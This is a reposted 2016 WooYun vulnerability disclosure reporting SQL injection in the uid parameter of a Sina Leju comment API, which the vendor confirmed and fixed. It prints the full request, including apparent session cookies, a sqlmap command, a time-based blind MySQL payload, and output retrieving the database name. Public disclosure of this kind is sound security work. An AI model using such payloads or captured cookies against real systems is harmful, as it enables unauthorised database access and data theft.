新浪乐居某接口存在SQL注入

admin
admin
admin
105013
文章
87
评论
2017年4月25日01:59:41评论229 views字数 237阅读0分47秒阅读模式
摘要

2016-04-23: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2016-199491

漏洞标题: 新浪乐居某接口存在SQL注入

相关厂商: leju.com

漏洞作者: null_z

提交时间: 2016-04-23 09:23

修复时间: 2016-04-25 11:06

公开时间: 2016-04-25 11:06

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经修复

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+字符类型注射 Mysql

1人收藏

漏洞详情

披露状态:

2016-04-23: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

SQL注入

详细说明:

注入参数 uid

code 区域 
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
 Host: comment.leju.com
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
 Accept-Encoding: gzip, deflate, sdch
 Host: comment.leju.com
 Accept: */*
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
 Connection: keep-alive
 Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
 Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810

漏洞证明:

code 区域 
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T

新浪乐居某接口存在SQL注入

code 区域 
---
 Parameter: #1* (URI)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
 ---
 [22:49:28] [INFO] testing MySQL
 do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
 [22:49:57] [INFO] confirming MySQL
 [22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
 [22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
 [22:50:37] [INFO] the back-end DBMS is MySQL
 back-end DBMS: MySQL >= 5.0.0
 [22:50:37] [INFO] fetching current database
 [22:50:37] [INFO] retrieved: comment_leju_com
 current database:    'comment_leju_com'
 [23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'

修复方案:

~~~

版权声明:转载请注明来源 null_z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-24 13:49

厂商回复:

非常感谢您对乐居关注

最新状态:

2016-04-25:漏洞已修复,再次感谢

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin